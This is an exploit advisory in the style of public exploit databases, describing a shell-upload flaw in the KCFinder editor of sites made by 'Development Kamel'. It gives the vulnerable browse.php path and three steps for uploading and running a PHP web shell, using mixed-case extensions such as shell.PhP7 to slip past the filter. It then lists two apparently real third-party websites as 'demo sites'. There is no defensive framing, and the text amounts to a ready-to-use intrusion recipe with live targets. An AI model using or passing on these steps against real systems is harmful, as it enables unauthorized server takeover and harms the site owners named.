####################################################### # # [+] Exploit Title : Development Kamel - KCFinder Shell Upload Vulnerability # [+] Date : 25/03/2021 # [+] Exploit Author : RAYAN ALi # [+] Home : http://kamel.tech/ # [+] Discovered By : RAYAN # [+] Vendor Homepage : http://kamel.tech/ # ####################################################### # # [+] Exploit: # # [+] http://[localhost]/resources/admin/Editor/kcfinder/browse.php?type=files # # ####################################################### # # [+] Proof: # # [~] STEP 1 > Go to target link # http://localhost/resources/admin/Editor/kcfinder/browse.php?type=files # # # [~] STEP 2 > Upload your shell as [ shell.PhP7 & shell.PhP5 ] # # [~] STEP 3 > Shell execution path # http://[localhost]/[path]/resources/uploads/files/shell.PhP7 # [~] The End # ####################################################### # Demo Site: http://waqftaiba.sa/resources/admin/Editor/kcfinder/browse.php?type=files https://qepsco.com/resources/admin/Editor/kcfinder/browse.php?type=files ####################################################### # # [+] Discovered By : RAYAN ALI # [+] https://twitter.com/i0i8x # [+] https://www.instagram.com/vgz_/ # [+] Home : Null # #######################################################